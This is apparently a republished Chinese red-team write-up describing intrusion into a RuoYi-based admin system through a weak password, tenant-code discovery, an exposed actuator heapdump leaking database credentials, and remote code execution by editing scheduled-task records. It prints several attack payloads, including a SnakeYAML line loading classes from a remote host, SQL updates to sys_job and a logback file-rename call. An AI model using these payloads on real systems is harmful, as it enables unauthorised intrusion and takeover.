文章总结： 文章记录红队实战中对若依二开系统的渗透过程：先借弱口令与租户码绕过登录，再利用actuator泄露heapdump拿到数据库密码直连库，最终通过直接修改数据库定时任务字段实现RCE，验证灵机突破白名单限制的思路。 综合评分： 82 文章分类： 红队,内网渗透,漏洞分析,实战经验,WEB安全

若依小记

原创

00

千寻安服

2025年12月23日 09:01 四川

若依小记

被叫回来打红队，直接从其他大哥发现的一个站入手，访问根目录会提示登录，点击重新登录即可跳转到登录页面：

进入登录页面后会先提示一个错误：

使用已经发现的弱口令登录，发现登录成功后紧接着又会提示重新登录然后自动退出系统，无法进入系统后台：

看登录请求包可以发现用户名和密码没有问题，服务端也成功返回了jwt：

但紧接着调后面的接口时又会返回登录状态过期：

这时想到访问登录页面时会爆一个错误，找到相应的请求包，可以发现传入了一个tenantCode参数，也就是租户代码，很明显这里的租户代码不对，所以导致服务端报错了：

那么就要去找正确的租户代码，可以直接字符爆破，但是这里发现访问系统根目录时将提示重新登录的框关掉，会进入一个前台，通过前台自动调用的一些接口，可以找到一个租户master：

多次测试后发现在网站根目录后添加对应的租户代码再访问，即可进入对应租户的登录页面，相应检查租户代码的接口也正常返回信息：

之后使用弱口令成功登录系统，同时也发现该系统是基于若依进行的二开，但该用户不是若依的超级管理员，就算将角色修改为超级管理员后，仍然缺少一些关键功能：

该系统同时有actuator未授权，通过heapdump获取到数据库密码，同时发现数据库端口映射在了互联网上可以直接连接，所以可以直接数据库修改admin的密码hash：

成功登录admin，查看功能列表发现有若依经典的定时任务功能：

然后试了下snakeyaml利用的几个payload发现都不行：

org.yaml.snakeyaml.Yaml.load(‘!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\”h’t’t’p://x.x.x.x/\”]]]]’)

jdbcTemplate(“update sys_job set

invoke_target=0x31 where job_id=1″)

genTableServiceImpl.createTable(“update sys_job set

invoke_target=0x31 where job_id=1″)

又试了存在thymeleaf模版注入的几个接口，正好最近有绕过，但是发现接口都没有：

然后想起还有个移动文件的打法，试了下方法确实能够调用，配合另外一个端口的目录浏览也可以发现文件是可以移动并且重命名的：

https://xz.aliyun.com/news/17890

ch.qos.logback.core.rolling.helper.RenameUtil.renameByCopying(“/root/1″,”/root/xxx/2”)

因为该系统的ssh也映射出来了，同时还出网，就想着直接传个ssh公钥或者定时任务，再移动一下，不是就妥妥的了吗，兴冲冲的尝试上传文件后，发现所有上传接口都上传到oss上了，emm…：

又想到之前jdbc不出网利用时，有个临时文件+heapdump获取路径的，这里不正好吗，上传文件然后下载heapdump获取临时文件路径再移动，心里美滋滋的想着，又兴冲冲的弄好再下载heapdump，分析发现并没有临时文件，可能是文件都上传到oss上的原因，本地并没有生成临时文件：

https://xz.aliyun.com/news/17830

又试了mysql写文件，只能日志写，所以有很多垃圾字符，又没有找到可以解析的web路径，无奈又放弃，后面就是在文件移动的基础上捣鼓，捣鼓了大半天，眼见就要下班了，没办法，就把之前的成果写成报告结束了：

下了班之后也一直心心念念，毕竟中午觉都没睡捣鼓大半天还没打动，回家的路上突然想到，定时任务的方法保存后直接存在数据库里的，现在数据库都能直接连了，那直接在数据库里改不就行了，只要执行的时候不校验，管他白名单黑名单的，并且有个payload也是直接改的数据库，到家试了一下，没问题可以打，有时候绞尽脑汁真不如灵机一动，经验还是太少了，还得多练：

监制丨铁   子

策划丨Cupid

美工丨molin

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：千寻安服 00《若依小记》